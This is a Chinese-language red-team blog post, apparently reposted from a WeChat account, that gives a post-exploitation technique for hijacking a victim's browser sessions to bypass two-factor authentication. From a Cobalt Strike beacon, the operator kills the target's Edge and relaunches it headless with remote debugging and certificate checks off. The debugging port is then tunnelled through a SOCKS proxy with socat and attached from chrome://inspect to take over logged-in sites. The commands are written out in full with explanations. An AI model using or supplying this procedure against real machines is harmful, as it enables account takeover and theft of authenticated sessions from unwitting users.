上篇文章是google 浏览器的调试模式,这篇文章是讲微软的Microsoft Edge,Edge浏览器是用户常用的浏览器之一,与其它主流理论一样,是支持开发者模式的,网站开发人员可以借助Edge浏览器中的开发者模式来调试网页。且该模式还支持查看已保存的账号密码等等功能,非常实用
实验环境
cobalt strike
被控制端
Edge
谷歌浏览器
第一步先把对方的Edge关闭掉,然后被控机器运行下面代码
execute "C:Program Files (x86)MicrosoftEdgeApplicationmsedge.exe" --remote-debugging-port=9222 -user-data-dir=%localappdate%tempmy-edge-dir --headless --ignore-certificate-errors about:blank
解释下命令意思
--remote-debugging-port=9222:这个选项指定Edge浏览器的远程调试端口号为9222。这意味着您可以使用此端口连接到浏览器并进行远程调试。
-user-data-dir=%localappdata%tempmy-edge-dir:这个选项指定了Edge浏览器的用户数据目录。在这里,它将用户数据保存在本地应用数据目录下的tempmy-edge-dir文件夹中。这对于创建一个干净的临时浏览器环境非常有用。
--headless:这个选项告诉Edge浏览器在无头(headless)模式下运行,即没有图形用户界面。它通常用于自动化测试和脚本执行,因为不需要显示浏览器窗口。
--ignore-certificate-errors:此选项告诉Edge浏览器忽略SSL证书错误。在某些情况下,您可能需要这样做,但请小心使用,因为忽略证书错误可能会降低安全性。
about:blank:这是启动Edge浏览器时要加载的初始页面。在这种情况下,它加载一个空白页面。
开启9999代理
socks 9999
使用socat端口转发
socat TCP4-LISTEN:9222,FORK SOCKS4:127.0.0.1:127.0.0.1:9222,SOCKSPORT=9999
socat:这是一个命令行实用程序,用于在两个端点之间创建双向数据流(例如,套接字、文件、管道等)。
TCP4-LISTEN:9222,FORK:这部分命令告诉socat在端口9222上监听传入的TCP连接,并创建一个新的进程来处理每个连接。换句话说,它在端口9222上设置了一个TCP服务器。
SOCKS4:127.0.0.1:127.0.0.1:9222,SOCKSPORT=9999:这部分命令告诉socat使用SOCKS4代理协议,将传入的连接从本地主机(127.0.0.1)的端口9222转发到本地主机(127.0.0.1)的另一个端口,这个另一个端口是9222。同时,它还指定了SOCKS代理服务器的端口为9999。这意味着传入的连接将通过SOCKS4代理服务器进行中转,然后达到目标地址127.0.0.1的9222端口。
总之,这个命令的作用是将通过TCP连接到达端口9222的流量经过SOCKS4代理服务器,然后转发到本地主机的另一个端口9222。这种配置可以用于网络代理或端口转发的需求。
打开谷歌浏览器输入
chrome://inspect
输入IP地址连接
这样就可以登录网站
参考
https://pbs.twimg.com/media/Fy0L-HMXwAARlGv?format=jpg&name=large
https://pbs.twimg.com/media/Fy0L-HIXsAEYoe6?format=jpg&name=large
原文始发于微信公众号(红队笔记录):微软浏览器模式:绕过2FA认证的秘密武器
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论